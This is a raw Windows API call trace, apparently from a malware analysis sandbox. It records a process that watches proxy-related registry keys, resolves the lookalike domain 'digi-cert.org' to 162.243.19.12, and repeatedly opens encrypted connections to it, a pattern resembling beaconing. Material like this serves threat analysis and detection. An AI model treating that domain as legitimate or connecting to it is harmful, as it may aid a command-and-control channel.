	[0311.939] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0xa80) returned 0x0
	[0311.939] RegOpenKeyExW (in: hKey=0xa80, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0xa5c) returned 0x0
	[0311.940] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe4
	[0311.940] RegNotifyChangeKeyValue (hKey=0xa5c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xe4, fAsynchronous=1) returned 0x0
	[0311.941] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x25c) returned 0x0
	[0311.942] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x270
	[0311.942] RegNotifyChangeKeyValue (hKey=0x25c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x270, fAsynchronous=1) returned 0x0
	[0311.943] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa70) returned 0x0
	[0311.944] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa64
	[0311.944] RegNotifyChangeKeyValue (hKey=0xa70, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa64, fAsynchronous=1) returned 0x0
	[0311.944] GetCurrentProcess () returned 0xffffffffffffffff
	[0311.944] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0x394) returned 1
	[0311.945] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc689740
	[0311.945] WinHttpSetTimeouts (hInternet=0x233fc689740, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0311.946] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0311.967] SetEvent (hEvent=0x6b4) returned 1
	[0311.970] select (in: nfds=0, readfds=0x233e492eac0, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e492eac0, writefds=0x0, exceptfds=0x0) returned 1
	[0311.970] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0311.973] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0311.974] shutdown (s=0x7cc, how=2) returned 0
	[0311.983] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0311.986] closesocket (s=0x7cc) returned 0
	[0311.988] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0311.988] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa58
	[0311.989] CoTaskMemAlloc (cb=0xf) returned 0x233fc714c20
	[0311.989] getaddrinfo (in: pNodeName="digi-cert.org", pServiceName=0x0, pHints=0x350199bba0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x350199bb98 | out: ppResult=0x350199bb98*=0x233fc6619f0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="digi-cert.org", ai_addr=0x233fc714e20*(sa_family=2, sin_port=0x0, sin_addr="162.243.19.12"), ai_next=0x0)) returned 0
	[0311.996] CoTaskMemFree (pv=0x233fc714c20) 
	[0311.996] CoTaskMemFree (pv=0x0) 
	[0311.997] FreeAddrInfoW (pAddrInfo=0x233fc6619f0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="楤楧挭牥⹴牯g", ai_addr=0x233fc714e20*(sa_family=2, sin_port=0x0, sin_addr="162.243.19.12"), ai_next=0x0)) 
	[0311.997] WSAConnect (in: s=0x7cc, name=0x233e49305f8*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0312.107] closesocket (s=0xa58) returned 0
	[0312.109] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e492d200, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e4930e80, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e4930e80, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0312.115] FreeContextBuffer (in: pvContextBuffer=0x233fc6868d0 | out: pvContextBuffer=0x233fc6868d0) returned 0x0
	[0312.115] send (in: s=0x7cc, buf=0x233e4930f50*, len=333, flags=0 | out: buf=0x233e4930f50*) returned 333
	[0312.115] recv (in: s=0x7cc, buf=0x233e4930f50, len=5, flags=0 | out: buf=0x233e4930f50*) returned 5
	[0312.223] recv (in: s=0x7cc, buf=0x233e4930f55, len=49, flags=0 | out: buf=0x233e4930f55*) returned 49
	[0312.225] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e492d200, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4931190, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e49311b0, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e49311b0, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0312.226] recv (in: s=0x7cc, buf=0x233e49312a0, len=5, flags=0 | out: buf=0x233e49312a0*) returned 5
	[0312.226] recv (in: s=0x7cc, buf=0x233e49312c5, len=1, flags=0 | out: buf=0x233e49312c5*) returned 1
	[0312.226] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e492d200, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4931398, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e49313b8, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e49313b8, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0312.227] recv (in: s=0x7cc, buf=0x233e49314a8, len=5, flags=0 | out: buf=0x233e49314a8*) returned 5
	[0312.227] recv (in: s=0x7cc, buf=0x233e49314cd, len=48, flags=0 | out: buf=0x233e49314cd*) returned 48
	[0312.227] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e492d200, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e49315d0, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e49315f0, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e49315f0, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0312.229] FreeContextBuffer (in: pvContextBuffer=0x233e399c880 | out: pvContextBuffer=0x233e399c880) returned 0x0
	[0312.230] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e4931738 | out: pBuffer=0x233e4931738) returned 0x0
	[0312.231] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e4931790 | out: pBuffer=0x233e4931790) returned 0x0
	[0312.231] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e49317f8 | out: pBuffer=0x233e49317f8) returned 0x0
	[0312.232] CertDuplicateCertificateContext (pCertContext=0x233fc6804b0) returned 0x233fc6804b0
	[0312.233] CertDuplicateStore (hCertStore=0x233fc6831b0) returned 0x233fc6831b0
	[0312.233] CertEnumCertificatesInStore (hCertStore=0x233fc6831b0, pPrevCertContext=0x0) returned 0x233fc6804b0
	[0312.234] CertDuplicateCertificateContext (pCertContext=0x233fc6804b0) returned 0x233fc6804b0
	[0312.234] CertEnumCertificatesInStore (hCertStore=0x233fc6831b0, pPrevCertContext=0x233fc6804b0) returned 0x0
	[0312.234] CertCloseStore (hCertStore=0x233fc6831b0, dwFlags=0x0) returned 1
	[0312.235] CertFreeCertificateContext (pCertContext=0x233fc6804b0) returned 1
	[0312.237] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc682310
	[0312.238] CertAddCRLLinkToStore (in: hCertStore=0x233fc682310, pCrlContext=0x233fc6804b0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0312.238] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc6804b0, pTime=0x350199b4c8, hAdditionalStore=0x233fc682310, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0312.241] CertDuplicateCertificateChain (pChainContext=0x233fc6fec90) returned 0x233fc6fec90
	[0312.243] CertDuplicateCertificateContext (pCertContext=0x233fc6804b0) returned 0x233fc6804b0
	[0312.245] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0312.246] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0312.246] CertFreeCertificateChain (pChainContext=0x233fc6fec90) 
	[0312.246] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6fec90, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0312.246] SetLastError (dwErrCode=0x0) 
	[0312.247] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6fec90, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0312.249] CertFreeCertificateChain (pChainContext=0x233fc6fec90) 
	[0312.249] CertFreeCertificateContext (pCertContext=0x233fc6804b0) returned 1
	[0312.250] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e4934400, MessageSeqNo=0x0 | out: pMessage=0x233e4934400) returned 0x0
	[0312.251] CoTaskMemAlloc (cb=0x20) returned 0x233fc64f9f0
	[0312.251] WSASend (in: s=0x7cc, lpBuffers=0x233fc64f9f0*=((len=0x3b, buf=0x233e49316c0*), (len=0xd5, buf=0x233e4934208*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc64f9f0*=((len=0x3b, buf=0x233e49316c0*), (len=0xd5, buf=0x233e4934208*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0312.252] CoTaskMemFree (pv=0x233fc64f9f0) 
	[0312.252] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0312.252] recv (in: s=0x7cc, buf=0x233e49345a8, len=5, flags=0 | out: buf=0x233e49345a8*) returned 5
	[0312.718] recv (in: s=0x7cc, buf=0x233e49345cd, len=1488, flags=0 | out: buf=0x233e49345cd*) returned 1488
	[0312.719] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e4934cb0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e4934cb0, pfQOP=0x0) returned 0x0
	[0312.720] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0312.720] SetEvent (hEvent=0x6b4) returned 1
	[0312.761] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa80
	[0327.764] CloseHandle (hObject=0xa80) returned 1
	[0327.928] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0xa80) returned 0x0
	[0327.929] RegOpenKeyExW (in: hKey=0xa80, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0xa5c) returned 0x0
	[0327.929] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe4
	[0327.929] RegNotifyChangeKeyValue (hKey=0xa5c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xe4, fAsynchronous=1) returned 0x0
	[0327.930] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x25c) returned 0x0
	[0327.930] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x270
	[0327.930] RegNotifyChangeKeyValue (hKey=0x25c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x270, fAsynchronous=1) returned 0x0
	[0327.930] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa70) returned 0x0
	[0327.931] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa64
	[0327.931] RegNotifyChangeKeyValue (hKey=0xa70, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa64, fAsynchronous=1) returned 0x0
	[0327.931] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0x394) returned 1
	[0327.932] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc689740
	[0327.932] WinHttpSetTimeouts (hInternet=0x233fc689740, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0327.932] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0327.944] SetEvent (hEvent=0x6b4) returned 1
	[0327.945] select (in: nfds=0, readfds=0x233e493c3c8, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e493c3c8, writefds=0x0, exceptfds=0x0) returned 1
	[0327.945] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0327.946] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0327.947] shutdown (s=0x7cc, how=2) returned 0
	[0327.948] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0327.948] closesocket (s=0x7cc) returned 0
	[0327.949] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0327.949] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa58
	[0327.950] WSAConnect (in: s=0x7cc, name=0x233e493db60*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0328.056] closesocket (s=0xa58) returned 0
	[0328.057] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e493ab08, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e493e3e8, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e493e3e8, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0328.057] FreeContextBuffer (in: pvContextBuffer=0x233fc687fd0 | out: pvContextBuffer=0x233fc687fd0) returned 0x0
	[0328.057] send (in: s=0x7cc, buf=0x233e493e4b8*, len=333, flags=0 | out: buf=0x233e493e4b8*) returned 333
	[0328.058] recv (in: s=0x7cc, buf=0x233e493e4b8, len=5, flags=0 | out: buf=0x233e493e4b8*) returned 5
	[0328.171] recv (in: s=0x7cc, buf=0x233e493e4bd, len=49, flags=0 | out: buf=0x233e493e4bd*) returned 49
	[0328.173] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e493ab08, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e493e6f8, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e493e718, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e493e718, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0328.173] recv (in: s=0x7cc, buf=0x233e493e808, len=5, flags=0 | out: buf=0x233e493e808*) returned 5
	[0328.173] recv (in: s=0x7cc, buf=0x233e493e82d, len=1, flags=0 | out: buf=0x233e493e82d*) returned 1
	[0328.174] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e493ab08, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e493e900, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e493e920, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e493e920, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0328.174] recv (in: s=0x7cc, buf=0x233e493ea10, len=5, flags=0 | out: buf=0x233e493ea10*) returned 5
	[0328.174] recv (in: s=0x7cc, buf=0x233e493ea35, len=48, flags=0 | out: buf=0x233e493ea35*) returned 48
	[0328.174] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e493ab08, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e493eb38, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e493eb58, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e493eb58, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0328.175] FreeContextBuffer (in: pvContextBuffer=0x233e399c0a0 | out: pvContextBuffer=0x233e399c0a0) returned 0x0
	[0328.175] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e493eca0 | out: pBuffer=0x233e493eca0) returned 0x0
	[0328.175] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e493ecf8 | out: pBuffer=0x233e493ecf8) returned 0x0
	[0328.176] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e493ed60 | out: pBuffer=0x233e493ed60) returned 0x0
	[0328.177] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0328.178] CertDuplicateStore (hCertStore=0x233fc683420) returned 0x233fc683420
	[0328.178] CertEnumCertificatesInStore (hCertStore=0x233fc683420, pPrevCertContext=0x0) returned 0x233fc67feb0
	[0328.179] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0328.179] CertEnumCertificatesInStore (hCertStore=0x233fc683420, pPrevCertContext=0x233fc67feb0) returned 0x0
	[0328.179] CertCloseStore (hCertStore=0x233fc683420, dwFlags=0x0) returned 1
	[0328.179] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0328.180] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc682e70
	[0328.181] CertAddCRLLinkToStore (in: hCertStore=0x233fc682e70, pCrlContext=0x233fc67feb0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0328.181] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67feb0, pTime=0x350199b4c8, hAdditionalStore=0x233fc682e70, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0328.183] CertDuplicateCertificateChain (pChainContext=0x233fc6fec90) returned 0x233fc6fec90
	[0328.185] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0328.187] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0328.188] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0328.188] CertFreeCertificateChain (pChainContext=0x233fc6fec90) 
	[0328.188] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6fec90, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0328.188] SetLastError (dwErrCode=0x0) 
	[0328.189] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6fec90, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0328.190] CertFreeCertificateChain (pChainContext=0x233fc6fec90) 
	[0328.190] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0328.191] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e4941968, MessageSeqNo=0x0 | out: pMessage=0x233e4941968) returned 0x0
	[0328.191] CoTaskMemAlloc (cb=0x20) returned 0x233fc64fcf0
	[0328.192] WSASend (in: s=0x7cc, lpBuffers=0x233fc64fcf0*=((len=0x3b, buf=0x233e493ec28*), (len=0xd5, buf=0x233e4941770*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc64fcf0*=((len=0x3b, buf=0x233e493ec28*), (len=0xd5, buf=0x233e4941770*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0328.192] CoTaskMemFree (pv=0x233fc64fcf0) 
	[0328.193] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0328.193] recv (in: s=0x7cc, buf=0x233e4941b10, len=5, flags=0 | out: buf=0x233e4941b10*) returned 5
	[0328.689] recv (in: s=0x7cc, buf=0x233e4941b35, len=1488, flags=0 | out: buf=0x233e4941b35*) returned 1488
	[0328.691] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e4942218, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e4942218, pfQOP=0x0) returned 0x0
	[0328.693] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0328.693] SetEvent (hEvent=0x6b4) returned 1
	[0328.780] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa80
	[0331.785] CloseHandle (hObject=0xa80) returned 1
	[0331.792] _vsnwprintf_s (in: _Buffer=0x350199bf98, _BufferCount=0x19, _MaxCount=0x18, _Format="%hu.", _ArgList=0x350199bf08 | out: _Buffer="2.") returned 2
	[0331.958] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0xa80) returned 0x0
	[0331.959] RegOpenKeyExW (in: hKey=0xa80, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0xa5c) returned 0x0
	[0331.959] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe4
	[0331.959] RegNotifyChangeKeyValue (hKey=0xa5c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xe4, fAsynchronous=1) returned 0x0
	[0331.961] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x25c) returned 0x0
	[0331.962] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x270
	[0331.962] RegNotifyChangeKeyValue (hKey=0x25c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x270, fAsynchronous=1) returned 0x0
	[0331.964] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa70) returned 0x0
	[0331.965] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa64
	[0331.965] RegNotifyChangeKeyValue (hKey=0xa70, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa64, fAsynchronous=1) returned 0x0
	[0331.965] GetCurrentProcess () returned 0xffffffffffffffff
	[0331.965] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0x394) returned 1
	[0331.966] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc689960
	[0331.966] WinHttpSetTimeouts (hInternet=0x233fc689960, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0331.966] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0331.992] SetEvent (hEvent=0x6b4) returned 1
	[0331.992] select (in: nfds=0, readfds=0x233e483ad98, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e483ad98, writefds=0x0, exceptfds=0x0) returned 0
	[0331.993] EncryptMessage (in: phContext=0x350199bba0, fQOP=0x0, pMessage=0x233e483b330, MessageSeqNo=0x0 | out: pMessage=0x233e483b330) returned 0x0
	[0331.993] send (in: s=0x7cc, buf=0x233e483b138*, len=213, flags=0 | out: buf=0x233e483b138*) returned 213
	[0331.996] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0331.996] recv (in: s=0x7cc, buf=0x233e46eab00, len=5, flags=0 | out: buf=0x233e46eab00*) returned 5
	[0332.514] recv (in: s=0x7cc, buf=0x233e46eab05, len=1488, flags=0 | out: buf=0x233e46eab05*) returned 1488
	[0332.514] DecryptMessage (in: phContext=0x350199b760, pMessage=0x233e483b550, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e483b550, pfQOP=0x0) returned 0x0
	[0332.515] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0332.515] SetEvent (hEvent=0x6b4) returned 1
	[0332.537] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x394
	[0354.545] CloseHandle (hObject=0x394) returned 1
	[0354.834] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0x394) returned 0x0
	[0354.835] RegOpenKeyExW (in: hKey=0x394, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0x164) returned 0x0
	[0354.836] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa64
	[0354.836] RegNotifyChangeKeyValue (hKey=0x164, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa64, fAsynchronous=1) returned 0x0
	[0354.837] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x3c4) returned 0x0
	[0354.838] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa80
	[0354.838] RegNotifyChangeKeyValue (hKey=0x3c4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa80, fAsynchronous=1) returned 0x0
